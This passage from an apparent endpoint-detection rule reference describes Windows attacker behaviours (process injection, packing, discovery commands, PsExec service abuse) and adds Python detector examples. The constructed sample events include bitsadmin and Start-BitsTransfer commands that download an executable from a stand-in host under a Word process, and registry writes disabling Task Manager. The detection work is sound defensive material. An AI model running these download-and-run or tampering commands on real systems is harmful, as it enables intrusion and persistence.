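The "Non-Microsoft Modifies ..." rules above all key on the same two conditions: the writing process is not Microsoft's, and the target is one of a small set of security-relevant registry values. The following Python is an added example of that logic run over constructed registry-write events; it is not the NetWitness rule definitions and does not use the product's rule syntax. The registry paths, the event fields (process, signer, signature_valid, key, value_name) and the reading of "non-Microsoft" as "no valid Microsoft Authenticode signature" are assumptions made for the illustration.

```python
"""Added example: a classifier for the "Non-Microsoft Modifies ..." rule family.

Not the NetWitness rule definitions. Registry paths, event fields and the
"non-Microsoft == no valid Microsoft Authenticode signature" reading are
assumptions made for this illustration.
"""
import re
from dataclasses import dataclass
from fnmatch import fnmatchcase
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class RegistryWrite:
    """One registry value write, in the shape an endpoint agent might report it (constructed)."""
    process: str           # image name of the writing process
    signer: str            # Authenticode signer subject, "" when unsigned
    signature_valid: bool  # whether the signature chain verified
    key: str               # registry key path as reported
    value_name: str        # value written under that key


# Ordered (pattern, boc value) pairs. Patterns are lower-case, use the short hive
# names hklm/hkcu, and may contain fnmatch wildcards. Specific patterns come before
# the generic "policies\system\*" one because the first match wins. The paths are
# assumed well-known Windows locations, not taken from the NetWitness rules.
INTERNET_SETTINGS = r"hk*\software\microsoft\windows\currentversion\internet settings"
SYSTEM_POLICY = r"hk*\software\microsoft\windows\currentversion\policies\system"
WATCHED_SETTINGS: List[Tuple[str, str]] = [
    (INTERNET_SETTINGS + r"\warnonzonecrossing", "non-microsoft modifies zone crossing warning setting"),
    (INTERNET_SETTINGS + r"\warnonbadcertrecving", "non-microsoft modifies bad certificate warning setting"),
    (INTERNET_SETTINGS + r"\zones\*", "non-microsoft modifies internet zone setting"),
    (SYSTEM_POLICY + r"\disabletaskmgr", "non-microsoft modifies task manager setting"),
    (SYSTEM_POLICY + r"\disableregistrytools", "non-microsoft modifies registry editor setting"),
    (SYSTEM_POLICY + r"\enablelua", "non-microsoft modifies lua setting"),
    (SYSTEM_POLICY + r"\*", "non-microsoft modifies windows system policy"),
    (r"hklm\software\microsoft\security center\*", "non-microsoft modifies security center config"),
    (r"hklm\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\*",
     "non-microsoft modifies firewall policy"),
    (r"hklm\system\currentcontrolset\services\*\imagepath", "non-microsoft modifies services imagepath"),
]

HIVE_ALIASES = {"hkey_local_machine": "hklm", "hkey_current_user": "hkcu", "hkey_users": "hku"}


def normalize_path(key: str, value_name: str) -> str:
    """Lower-case the path, shorten hive names, and fold HKU\\<SID>\\... into HKCU so a
    per-user write reported under HKEY_USERS matches the same patterns."""
    path = f"{key}\\{value_name}".lower().replace("/", "\\")
    hive, _, rest = path.partition("\\")
    hive = HIVE_ALIASES.get(hive, hive)
    if hive == "hku":
        rest = re.sub(r"^[^\\]+\\", "", rest)  # drop the SID component
        hive = "hkcu"
    return f"{hive}\\{rest}"


def is_microsoft_signed(ev: RegistryWrite) -> bool:
    """Only a *valid* signature from a Microsoft subject counts; a binary whose
    signature does not verify is treated as non-Microsoft whatever it claims."""
    return ev.signature_valid and ev.signer.lower().startswith("microsoft")


def classify(ev: RegistryWrite) -> Optional[str]:
    """Return the boc meta value the write would generate, or None."""
    if is_microsoft_signed(ev):
        return None
    path = normalize_path(ev.key, ev.value_name)
    for pattern, tag in WATCHED_SETTINGS:
        if fnmatchcase(path, pattern):
            return tag
    return None


def detect(events: List[RegistryWrite]) -> List[Tuple[str, str]]:
    """(process, boc value) for every event that matches a rule."""
    return [(ev.process, tag) for ev in events if (tag := classify(ev)) is not None]


# Constructed sample events (not real telemetry).
POLICY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
SAMPLE_EVENTS = [
    RegistryWrite("svchost.exe", "Microsoft Windows", True, POLICY_KEY, "EnableLUA"),
    RegistryWrite("updater.exe", "", False, POLICY_KEY, "EnableLUA"),
    RegistryWrite("dropper.exe", "Microsoft Windows", False,  # claims Microsoft, signature invalid
                  r"HKEY_USERS\S-1-5-21-1004336348-1177238915-682003330-1001"
                  r"\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr"),
    RegistryWrite("dropper.exe", "", False, r"HKLM\SYSTEM\CurrentControlSet\Services\Spooler", "ImagePath"),
    RegistryWrite("setup.exe", "Contoso Ltd", True, r"HKCU\Software\Contoso", "InstallDir"),
    RegistryWrite("dropper.exe", "", False,
                  r"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System", "ConsentPromptBehaviorAdmin"),
]

if __name__ == "__main__":
    for process, tag in detect(SAMPLE_EVENTS):
        print(f"{process}: boc = {tag}")
```

Two details matter in practice: the signer check must require a valid signature, otherwise a binary that merely names a Microsoft subject passes; and the specific value patterns (DisableTaskMgr, EnableLUA, ...) must be tested before the generic Policies\System pattern, or every such write collapses into "modifies windows system policy".
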

Opens Process (opens_process)
This may indicate process injection, a method of executing arbitrary code in the address space of a separate live process. Execution via process injection may also evade detection by security products, since the execution is masked under a legitimate process. Opening a handle to another process is also common benign behaviour, so this indicator is most useful in combination with others.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = opens process

Packed (packed)
Malware may use packing applications to repackage itself frequently in order to evade threat detection solutions based on static signatures.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = packed

Packed And Autorun (packed_and_autorun)
Adversaries use software packing to compress or encrypt an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection; most packers decompress the executable code in memory at run time. To persist across reboots, attackers additionally configure the packed executable to run at system startup.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = packed and autorun

Packed And Network Access (packed_and_network_access)
Adversaries use software packing to compress or encrypt an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection; most packers decompress the executable code in memory at run time. In addition, this packed file is attempting to access the network.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = packed and network access

Registers Shim Database (registers_shim_database)
The Microsoft Windows Application Compatibility Toolkit (ACT) uses shims to give legacy applications backward compatibility on newer versions of Windows. Malicious actors may register their own shim database to gain persistence or elevate privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = registers shim database

Record Screen Captures Using PSR Tool (record_screen_captures_using_psr_tool)
Recording screen captures with the Problem Steps Recorder (PSR) tool can indicate an adversary taking screen captures of the desktop to gather information over the course of an operation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = record screen captures using psr tool

Queries Users Logged On Remote System (queries_users_logged_on_remote_system)
Querying the users logged on to a remote system can indicate someone trying to discover potential attack vectors, and the information gathered can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = queries users logged on remote system

Queries Users Logged On Local System (queries_users_logged_on_local_system)
Querying the users logged on to the local system can indicate someone trying to discover potential attack vectors, and the information gathered can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = queries users logged on local system

Queries Terminal Sessions (queries_terminal_sessions)
Querying terminal sessions can indicate someone trying to discover potential attack vectors, and the information gathered can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries terminal sessions

Queries Registry Using Command-Line Registry Tool (queries_registry_using_command-line_registry_tool)
Querying the registry with a command-line registry tool can indicate adversaries interacting with the Windows Registry to gather information about the system, its configuration, and installed software.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries registry using command-line registry tool

Queries Processes On Remote System (queries_processes_on_remote_system)
Querying the processes running on a remote system can indicate someone trying to discover potential attack vectors, and the information gathered can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = queries processes on remote system

Queries Processes On Local System (queries_processes_on_local_system)
Querying the processes running on the local system can indicate someone trying to discover potential attack vectors, and the information gathered can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries processes on local system

Queries Cached Kerberos Tickets (queries_cached_kerberos_tickets)
Querying cached Kerberos tickets can be part of an attempt to obtain credential material from the operating system and software: the tickets themselves, or account login and password information, normally in the form of a hash or a clear-text password. Such credentials can then be used for lateral movement and to access restricted information.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries cached kerberos tickets
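
The discovery rules from "Record Screen Captures Using PSR Tool" through "Queries Cached Kerberos Tickets" are all judgements about a process command line: which tool ran, and whether its switches point at the local machine or a remote one. The following Python is an added example, not the NetWitness rule definitions, that classifies constructed command lines into those rules. Which tool and switches each rule keys on (quser or query user, qwinsta or query session, tasklist with or without /S, reg query, klist, psr /start) is inferred from the rule names and is an assumption; the meta key emitted for each rule is the one the page lists.

```python
"""Added example: classify process command lines for the discovery rules from
"Record Screen Captures Using PSR Tool" to "Queries Cached Kerberos Tickets".

Not the NetWitness rule definitions. Which tool and switches each rule keys on is
inferred from the rule names and is an assumption; the meta key per rule is taken
from the page.
"""
import ntpath
import re
from typing import List, Optional, Tuple

Verdict = Tuple[str, str]  # (meta key, meta value) as the page lists them


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted paths together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def image_name(token: str) -> str:
    """Bare lower-case program name without directory or .exe suffix."""
    name = ntpath.basename(token).lower()
    return name[:-4] if name.endswith(".exe") else name


def targets_remote_host(args: List[str]) -> bool:
    """True when the switches name another machine: /server:HOST (quser, qwinsta),
    /s HOST (tasklist) or a UNC \\\\HOST path. An empty /server: is treated as local."""
    for i, a in enumerate(args):
        if a.startswith(("/server:", "-server:")):
            return len(a) > len("/server:")
        if a in ("/s", "-s", "/server") and i + 1 < len(args):
            return True
        if a.startswith("\\\\"):
            return True
    return False


def classify_cmdline(cmdline: str) -> Optional[Verdict]:
    """Map one command line to the (meta key, value) it would generate, or None."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    image, args = image_name(tokens[0]), [a.lower() for a in tokens[1:]]
    # query.exe is the front end for the same tools: "query user" == quser, "query session" == qwinsta
    if image == "query" and args:
        image, args = {"user": "quser", "session": "qwinsta"}.get(args[0], image), args[1:]
    remote = targets_remote_host(args)
    if image == "quser":
        return ("boc", "queries users logged on remote system" if remote else "queries users logged on local system")
    if image == "qwinsta":
        return ("analysis.file", "queries terminal sessions")
    if image == "tasklist":
        return ("boc", "queries processes on remote system") if remote else ("analysis.file", "queries processes on local system")
    if image == "reg" and args and args[0] == "query":
        return ("analysis.file", "queries registry using command-line registry tool")
    if image == "klist":
        return ("analysis.file", "queries cached kerberos tickets")
    if image == "psr" and "/start" in args:
        return ("boc", "record screen captures using psr tool")
    return None


def classify_many(cmdlines: List[str]) -> List[Tuple[str, Verdict]]:
    """(command line, verdict) for every command line that matches a rule."""
    return [(c, v) for c in cmdlines if (v := classify_cmdline(c)) is not None]


# Constructed sample command lines (not real telemetry). Hosts and paths are made up.
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\quser.exe /server:FS01",
    "quser",
    "query.exe user",
    r'"C:\Windows\System32\qwinsta.exe" /server:FS01',
    "tasklist /S FS01 /U corp\\svc_backup",
    "tasklist /v",
    r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"REG ADD HKCU\Software\Example /v Flag /d 1",
    "klist",
    r"psr.exe /start /output C:\Users\Public\steps.zip /sc 1 /gui 0",
    r"notepad.exe C:\Users\bob\quser.txt",   # tool name only inside an argument: no match
]

if __name__ == "__main__":
    for cmd, (key, value) in classify_many(SAMPLE_CMDLINES):
        print(f"{key} = {value:<55} <- {cmd}")
```

The classifier matches on the resolved image name, not on a substring of the whole command line, which is why the last sample (a document called quser.txt opened in Notepad) produces nothing; the query.exe front end and the local-versus-remote switch handling are the parts that a plain string match would get wrong.
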

Psexesvc Runs Shell Commands (psexesvc_runs_shell_commands)
PSEXESVC (the service-side component of Sysinternals PsExec) running shell commands can indicate someone executing a binary, command, or script through a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = psexesvc runs shell commands

Psexesvc Runs Scripting Engine (psexesvc_runs_scripting_engine)
PSEXESVC (the service-side component of Sysinternals PsExec) running a scripting engine can indicate someone executing a binary, command, or script through a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = psexesvc runs scripting engine
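
"Office Application Runs BITS" earlier on this page and the two Psexesvc rules above are parent/child lineage rules: what matters is not the child image on its own but which process spawned it. The following Python is an added example, not the NetWitness rule definitions, of that check run over a constructed process tree. It resolves the parent by process id rather than trusting any name in the child's command line, and for the Office rule it looks several levels up because a macro usually spawns cmd.exe before bitsadmin. The Office, shell and scripting-engine image lists, the Start-BitsTransfer command-line marker and the ancestor depth are assumptions.

```python
"""Added example: parent/child lineage checks for "Office Application Runs BITS" and the
two Psexesvc rules, run over constructed process-creation events.

Not the NetWitness rule definitions. The Office, shell and scripting-engine image
lists, the Start-BitsTransfer marker and the ancestor depth are assumptions.
"""
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str    # full image path
    cmdline: str


@dataclass(frozen=True)
class LineageRule:
    parents: frozenset          # ancestor image names that satisfy the rule
    children: frozenset         # child image names the rule fires on
    meta_key: str
    value: str
    max_depth: int = 1          # how far up the tree to look for a matching ancestor
    cmdline_marker: Optional[str] = None  # child command line must contain this (case-insensitive)


OFFICE = frozenset({"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                    "msaccess.exe", "mspub.exe", "visio.exe", "onenote.exe"})
PSEXESVC = frozenset({"psexesvc.exe"})
SHELLS = frozenset({"cmd.exe"})
SCRIPT_ENGINES = frozenset({"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"})

RULES = [
    # Office -> (anything) -> bitsadmin: macros usually go through cmd.exe first, so look 3 levels up.
    LineageRule(OFFICE, frozenset({"bitsadmin.exe"}), "boc", "office application runs bits", max_depth=3),
    # BITS driven from PowerShell instead of bitsadmin (Start-BitsTransfer cmdlet).
    LineageRule(OFFICE, frozenset({"powershell.exe", "pwsh.exe"}), "boc", "office application runs bits",
                max_depth=3, cmdline_marker="bitstransfer"),
    LineageRule(PSEXESVC, SHELLS, "boc", "psexesvc runs shell commands"),
    LineageRule(PSEXESVC, SCRIPT_ENGINES, "boc", "psexesvc runs scripting engine"),
]


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def build_table(events: List[ProcessEvent]) -> Dict[int, ProcessEvent]:
    return {e.pid: e for e in events}


def ancestors(ev: ProcessEvent, table: Dict[int, ProcessEvent], max_depth: int) -> List[ProcessEvent]:
    """Parent, grandparent, ... up to max_depth, stopping when the parent is unknown
    (already exited or outside the captured window)."""
    chain, cur = [], ev
    for _ in range(max_depth):
        cur = table.get(cur.ppid)
        if cur is None or cur is ev:
            break
        chain.append(cur)
    return chain


def match(ev: ProcessEvent, table: Dict[int, ProcessEvent]) -> List[Tuple[str, str]]:
    """Every (meta key, value) pair the event generates. The parent is identified by
    resolving ppid to the parent's own image, never by a name in the child's command line."""
    child = image_name(ev.image)
    hits = []
    for rule in RULES:
        if child not in rule.children:
            continue
        if rule.cmdline_marker and rule.cmdline_marker not in ev.cmdline.lower():
            continue
        if any(image_name(a.image) in rule.parents for a in ancestors(ev, table, rule.max_depth)):
            hits.append((rule.meta_key, rule.value))
    return hits


def detect(events: List[ProcessEvent]) -> List[Tuple[int, str, str]]:
    table = build_table(events)
    return [(e.pid, key, value) for e in events for key, value in match(e, table)]


# Constructed sample process tree (not real telemetry); the URL and paths are made up.
SAMPLE_EVENTS = [
    ProcessEvent(100, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r'"WINWORD.EXE" /n "C:\Users\bob\Downloads\invoice.docm"'),
    ProcessEvent(210, 200, r"C:\Windows\System32\cmd.exe",
                 r"cmd /c bitsadmin /transfer j /download http://example.invalid/a.bin C:\Users\Public\a.exe"),
    ProcessEvent(220, 210, r"C:\Windows\System32\bitsadmin.exe",
                 r"bitsadmin /transfer j /download http://example.invalid/a.bin C:\Users\Public\a.exe"),
    ProcessEvent(230, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -c Start-BitsTransfer -Source http://example.invalid/b.bin -Destination C:\\Users\\Public\\b.exe"),
    ProcessEvent(300, 4, r"C:\Windows\System32\services.exe", "services.exe"),
    ProcessEvent(310, 300, r"C:\Windows\PSEXESVC.exe", "PSEXESVC.exe"),
    ProcessEvent(320, 310, r"C:\Windows\System32\cmd.exe", "cmd /c whoami"),
    ProcessEvent(330, 310, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -nop -w hidden -c Get-Process"),
    ProcessEvent(400, 100, r"C:\Windows\System32\bitsadmin.exe", "bitsadmin /list"),  # not Office-parented
]

if __name__ == "__main__":
    for pid, key, value in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {key} = {value}")
```

On the sample tree only the four lineage hits fire: bitsadmin two levels under WINWORD, the Start-BitsTransfer PowerShell directly under WINWORD, and cmd.exe and powershell.exe under PSEXESVC. The bitsadmin launched from Explorer (pid 400) is left alone, which is the point of a lineage rule as opposed to an alert on the tool itself.
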

Regsvr32 Creates Windows Task (regsvr32_creates_windows_task)
Regsvr32.exe is a command-line program used to register and unregister object linking such as dynamic link libraries (